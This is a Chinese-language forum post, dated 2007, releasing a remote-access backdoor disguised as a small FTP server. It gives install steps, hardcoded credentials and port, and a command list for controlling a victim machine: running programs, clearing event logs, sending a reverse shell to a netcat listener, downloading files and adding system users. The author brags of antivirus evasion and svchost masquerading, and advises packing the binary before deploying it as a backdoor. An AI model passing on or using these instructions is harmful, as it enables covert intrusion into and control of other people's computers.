这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序，任何时间，任何地点，想怎么控制，就怎么玩。再加上它原创免杀的特性.怎么样，跃跃欲试了吧？

这次发布的是测试版，压缩包内共一个文件wmiapsrv.exe。测试方法：将其解压到一个不含空格的目录里，如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。

只需用任一款ftp连接工具（包括windows自带的ftp和IE），ip地址填服务端ip，端口填2100，用户名填sus，密码填sus666，确定后服务端的c:盘便立刻展现在眼前。

再看看其它的控制功能怎么实现的呢？
这里提供2种方法：

1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后，便可以输入后门控制命令，如pslist。


2.
运行ftp.exe，然后输入open <服务端ip> 2100，按照提示输入用户名sus，密码sus666便登陆进去了。除了运行传统的ftp命令外，这里还可以用quote加上马上要提到的后门控制命令，如quote pslist。


专用的后门控制命令如下，这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS's FTP BackDoor! Welcome to SUS!
Author: dklkt      Date: 2007.7
######################################################################

WINEXEC <exefilepath>          Using this to execute an executable file.
SHELLEXECUTE <exefilepath>      The same to above.
SETHOMEDIR <ftp's homedir>      Set the home directory of ftp's. Default is C:\
GETSYSINFO                      Get some system infomation
PSLIST                          List the Process on the system
PSKILL <PID>                    Kill a process by its pid
VIEWTERMPORT                    View Terminal Service's port. Default is 3389
SETTERMPORT <PortNum>          Set the Terminal Service's Port.
INSTALLTERM                    Install Terminal Service.
CLEANEVENT                      Clean the system event logs.
ENUMSERVICE                    List all the services in the system.
STARTSERVICE <ServcieName>      Start a service. Like "net start"
STOPSERVICE  <ServiceName>      Stop a service.
DELETESERVICE <ServiceName>    Delete a service.
VIEWSERVICE  <ServiceName>      View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT                          Reboot the system.
SHUTDOWN                        Power off the system.
STOPBACKDOOR                    Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port>      Send a back cmdshell. Use nc listen first
STARTSHELL <port>              Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath>      Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress>  Download a file using http protocol.
UNINSTALL                      Uninstall the Ftp Backdoor!
-------------------------------------------------
Good Luck! :-)

（本人英语比较搓，大家意会便可，语法问题多多 ^_^）

比如你在telnet模式下，想运行c:\mm.exe这个程序，便输入
winexec c:\mm.exe

在ftp模式下，想添加一个系统用户，可以输入
quote shellexecute net.exe user aaa /add

在telnet模式下,想修改ftp服务的home目录位置到d:盘，可以输入
sethomedir d:\

相应的的，ftp模式下，前面加上quote
quote sethomedir d:\


另外，虽然这是测试版，但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的，2100对应的16进制是834，因为是反序的，所以你查找34 08这两个字节就可以了，大约是在第a230那一行，改成相应的就行。比如想改成21，就把它改成15 00。希望大家自己用用就好，没必要对外传播。还有最好自己加个壳再拿去做后门。


差点忘了。把特性说明下：
本后门是替换系统服务自启动的，启动后伪装成svchost进程（相似程度100％）穿透防火墙。估计一般的辅助工具不容易查出来，这里你可以使用stopbackdoor命令停止后门，用uninstall命令卸载后门。